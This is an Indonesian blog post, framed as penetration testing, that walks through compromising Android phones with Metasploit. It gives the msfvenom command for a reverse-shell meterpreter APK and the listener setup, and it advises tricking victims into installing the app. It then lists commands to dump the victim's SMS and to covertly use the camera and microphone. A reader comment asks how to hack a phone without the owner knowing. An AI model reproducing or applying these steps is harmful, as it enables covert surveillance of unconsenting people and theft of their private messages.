Sunday 13 December 2015

Penetration Testing : Hacking Android Dengan Metasploit



Assalamualaikum Wr Wb

Admin Sudah Posting pengenalan Kali Linux Dan Sekarang admin bakal post Hacking Android With Metasploit,
atau lebih tepatnya remote android.
Oke Sebelumnya ada beberapa syarat,syarat nya yaitu:

1.Target Harus Satu jaringan sama kita,maksudnya? Target harus satu koneksi wifi dengan kita
2.OS Kali Linux/Windows

Tested on:
android jellybean ke atas
failed on android gingerbread

*WARNING!!: Ini Hanyalah Sebuah pembelajaran,Admin Tidak bertanggung jawab Jika ada Hal-Hal Yang tidak di inginkan.

Step By Step :

1.Pertama sobat harus Konek Ke Wifi,Kalo Udah Buka terminal dan ketikan ifconfig , dan copy ip sobat.

2.Kita lanjut untuk membuat payload dengan format
msfvenom -p android/meterpreter/reverse_tcp lhost=ip kalian lport=4444 R > /root/file.apk

Keterangan Perintah:
msfvenom: generator payload
-p : payload
android/meterpreter/reverse_tcp : exploit yang digunakan
lhost= : ip sobat
lport= : gunakan 4444
R > /root/file.apk : tempat menaruh output dan nama file.

*Catatan jika msfvenom tidak bisa,coba ganti dengan msfpayload.


3.Kirim File yang telah di generate tadi,Gimana Cara nya?You Should Try Social Engineering atau gampang nya nipu target.
kalo udah dikirim tinggal install di device korban.

4.masukan perintah msfconsole:

kalo udah kebuka ketik perintah ini berurutan:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.175 <<<(ip sobat)
set lport 4444
exploit

5.Tunggu/Suruh Korban Buka app yang tadi udah di install,kalo korban udah buka app nya gambarnya Kaya Gini :


6.Udah dibuka? Selamat Anda bisa "Nganu" Hp Orang :v,terus ngapain? ini ada beberapa perintah:

dump_sms = untuk mengumpulkan sms korban
webcam_snap = untuk membuka kamera korban
webcam_stream = untuk melihat aktivitas lewat kamera korban
record_mic = untuk merekam suara korban
help = untuk melihat perintah lainya
exit = untuk keluar dari metasploit

apa cuma android yang bisa di anu?
tidak,windows,mac,linux,hp java bisa,atau lebih jelas nya msfvenom -l untuk melihat daftar exploit.

Pesan Moral:
Jangan Menginstall Aplikasi Dari Sumber Yang Tidak Terpercaya.

oke bisa kan? kalo ada yang kurang jelas tolong tulis di kolom komentar ;)
atau kalian bisa liat video saya di bawah ini;


Sekian Dari Saya Bila ada kekurangan/tidak jelas mohon dimaafkan :)

Wassalamualaikum Wr Wb

Author: Hardian Alkori

6 comments:

  1. Adam Abdurrasyid Bahrein18 January 2016 at 23:25

    Mantap bozzz

    ReplyDelete
  2. Bingung22 March 2016 at 02:46

    Om, kan saya punya samsung galaxy S4 yang udah di root, pas jalankan aplikasinya malah muncul "Parsing Error", pas dijalankan di kali malah macet di Starting Payload". Solusinya gimana om?

    ReplyDelete
    Replies
    1. HardGhost Security22 March 2016 at 20:32

      di sign dulu aplikasi nya gan,maaf saya gak punya tutor nya mas :)

      Delete
  3. Unknown14 October 2016 at 18:14

    mas ada ngak yang hack androinya tanpa sepengetahuan pemiliknya

    ReplyDelete
  4. mbahbey11 December 2016 at 05:53

    gan di apk di instal di andro jelly kok error
    solusi gan

    ReplyDelete
  5. Unknown25 January 2017 at 23:45

    kalo app nya ditutup ato dihapus brarti kita gak punya akses lagi dong ? kalo pake web gitu bisa gak bukan pake apk

    ReplyDelete

Subscribe to: Post Comments (Atom)

About Me

My Photo
Bekasi, Jawa Barat, Indonesia
HardGhost Security Blog Yang Membahas Tentang Programming,Networking Dan Securitty.
HardGhost Security 2016. Powered by Blogger.

Quote

Think Big Thoughts,But Relish Small Pleasure

Theme Support

BTricks

Video Pentesting

Popular Posts

Our Facebook Page

"Facebook Admin"
Copyright © HardGhost Security | Powered by Blogger
Blogger Templates